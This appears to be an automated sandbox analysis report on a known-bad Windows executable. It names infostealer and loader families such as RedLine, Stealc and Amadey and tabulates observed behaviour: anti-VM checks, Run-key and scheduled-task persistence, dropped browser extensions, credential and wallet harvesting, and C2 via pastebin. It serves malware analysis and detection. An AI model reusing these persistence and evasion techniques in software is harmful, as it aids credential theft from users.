Analysis Overview
SHA256
32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9
Threat Level: Known bad
The file 32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9 was found to be: Known bad.
Malicious Activity Summary
Xworm
StormKitty payload
Detects ZharkBot payload
Stealc
RedLine payload
StormKitty
Lumma Stealer, LummaC
CryptBot
ZharkBot
Suspicious use of NtCreateUserProcessOtherParentProcess
RedLine
Amadey
Detect Xworm Payload
Contains code to disable Windows Defender
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Indirect Command Execution
Loads dropped DLL
Drops startup file
Unsecured Credentials: Credentials In Files
Checks computer location settings
Checks BIOS information in registry
Reads user/profile data of web browsers
Reads data files stored by FTP clients
Identifies Wine through registry keys
Executes dropped EXE
Drops Chrome extension
Looks up external IP address via web service
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Indicator Removal: File Deletion
Checks installed software on the system
Drops desktop.ini file(s)
Suspicious use of SetThreadContext
Drops file in System32 directory
Enumerates processes with tasklist
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Drops file in Windows directory
Unsigned PE
Program crash
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of SetWindowsHookEx
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Scheduled Task/Job: Scheduled Task
Checks processor information in registry
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-09-09 05:02
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-09 05:02
Reported
2024-09-09 05:07
Platform
win10-20240404-en
Max time kernel
299s
Max time network
300s
Command Line
Signatures
Amadey
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
CryptBot
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects ZharkBot payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Lumma Stealer, LummaC
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
Xworm
ZharkBot
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1000223001\a6035a70b6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000223001\a6035a70b6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000223001\a6035a70b6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1000223001\a6035a70b6.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Indirect Command Execution
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\service123.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Subsystem Framework = "\"C:\\ProgramData\\Microsoft Subsystem Framework\\winmsbt.exe\"" | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\Windows.exe" | C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe | N/A |
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_2E1554F9937BF8D3743D83D919742174 | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_2E1554F9937BF8D3743D83D919742174 | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\54E176903A096E58E807B60E1BDFA85C | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_2F09F384AB04F931E2EF39FD04145E2F | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_2F09F384AB04F931E2EF39FD04145E2F | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\54E176903A096E58E807B60E1BDFA85C | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_5F8ABD199E1CF2EB9B30F8FD50D3DB0D | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_5F8ABD199E1CF2EB9B30F8FD50D3DB0D | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000223001\a6035a70b6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\tEZYwqVfuQYU2\wSfRwKR.xml | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Program Files (x86)\TjUkTRKCSiJkC\yVlcrdN.dll | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Program Files (x86)\TjUkTRKCSiJkC\mPdOlvG.xml | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Program Files (x86)\FDxSmxakU\NbuCkm.dll | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Program Files (x86)\tEZYwqVfuQYU2\MNVbQukCVkHmG.dll | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR\sOPBqcf.xml | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Program Files (x86)\QSBDBQxFkAUn\klYSTNF.dll | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Program Files (x86)\FDxSmxakU\aUoLPQQ.xml | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR\KrYdjfY.dll | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\hzhNAJUNSjjdIpELG.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\FnGigHNXGPuYnow.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\gXgiPdpSGbihZCqEr.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe | N/A |
| File created | C:\Windows\Tasks\bOYLEOfZCACcRQIJvG.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
